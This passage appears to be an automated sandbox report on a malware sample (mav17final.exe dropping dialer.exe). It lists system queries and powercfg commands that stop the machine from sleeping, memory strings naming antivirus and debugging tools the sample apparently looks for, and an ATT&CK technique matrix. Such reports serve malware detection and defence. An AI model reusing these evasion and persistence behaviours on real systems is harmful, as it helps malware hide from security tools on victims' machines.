      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4C390 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79EA4C390
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA617BC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF79EA617BC
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9074610 RtlGetVersion,GetSystemInfo,InitializeCriticalSection,2_2_00007FF8B9074610
      Source: C:\Windows\System32\dwm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies power options to not sleep / hibernate
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\ProgramData\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bdagent.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fsgk32st.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avguard.exe
      Source: mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2067450371.0000018718D54000.00000004.00001000.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: savadminservice.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avcenter.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f-prot.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BullGuard.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: cfp.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avp.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: wireshark.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zlclient.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GDFwSvc.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dwengine.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: drweb32w.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgtray.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: McShield.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a2guard.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: savservice.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fsav.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a2service.exe
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C5610 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,2_2_00007FF8B93C5610
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C45E8 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,2_2_00007FF8B93C45E8

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		2
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Native API      		12
      Windows Service      		1
      Access Token Manipulation      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      System Service Discovery      		Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts3
      Service Execution      		1
      Bootkit      		12
      Windows Service      		2
      Obfuscated Files or Information      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook111
      Process Injection      		1
      DLL Side-Loading      		NTDS27
      System Information Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion      		LSA Secrets341
      Security Software Discovery      		SSHKeylogging3
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Masquerading      		Cached Domain Credentials131
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
